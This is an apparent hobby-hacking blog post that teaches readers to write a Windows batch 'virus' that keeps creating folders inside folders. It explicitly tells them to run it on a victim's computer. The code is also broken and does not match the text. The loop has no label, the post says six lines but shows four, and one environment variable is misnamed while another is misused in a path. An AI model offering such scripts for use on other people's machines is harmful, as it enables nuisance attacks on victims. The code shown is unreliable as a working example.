Create a Virus That will create Folder and Keep Create it in Folder And Keep Creating Itself, lets see.....
Hey Guyz,
welcome to Learnforhack,
Today i gonna tell u trick Thts much interesting.
Well going to tell you make a simple virus..So lets see...
We will create a batch virus tht will replicator folder..
Here is a Simple batch virus that contains only 6 lines, has the tendency to replicate itself again and again and keeps on creating a folder with same name, until a user stops it.
Things we need :-
Notepad Yeah only a notepad..
1. Open The Notepad..
2. Copy and paste blow codes..
cd C:\Documents and Settings\username\Desktop
md Virus
cd Virus
goto loop
3.Save it as folder.bat, before doing that you have to modify the code by changing the place where it says ‘username’ and instead of that replace it by the currently logged in username.
4. Then run it on the Victims computer to infect it.
5. Any how it doesnt cause much harm, but replicates folder inside a folder and goes on.
If you don't want to change always the username...
cd %userprofile%\Desktop
cd %alluserprofile%\Desktop
Well u can use ur own Code and do exciting things.
Example :-
what about something like ths
cd C:\Documents and Settings\%userprofile%\Desktop
set num=1
md %num%
set /a num=%num%+1
goto loop
Enjoy iT.....
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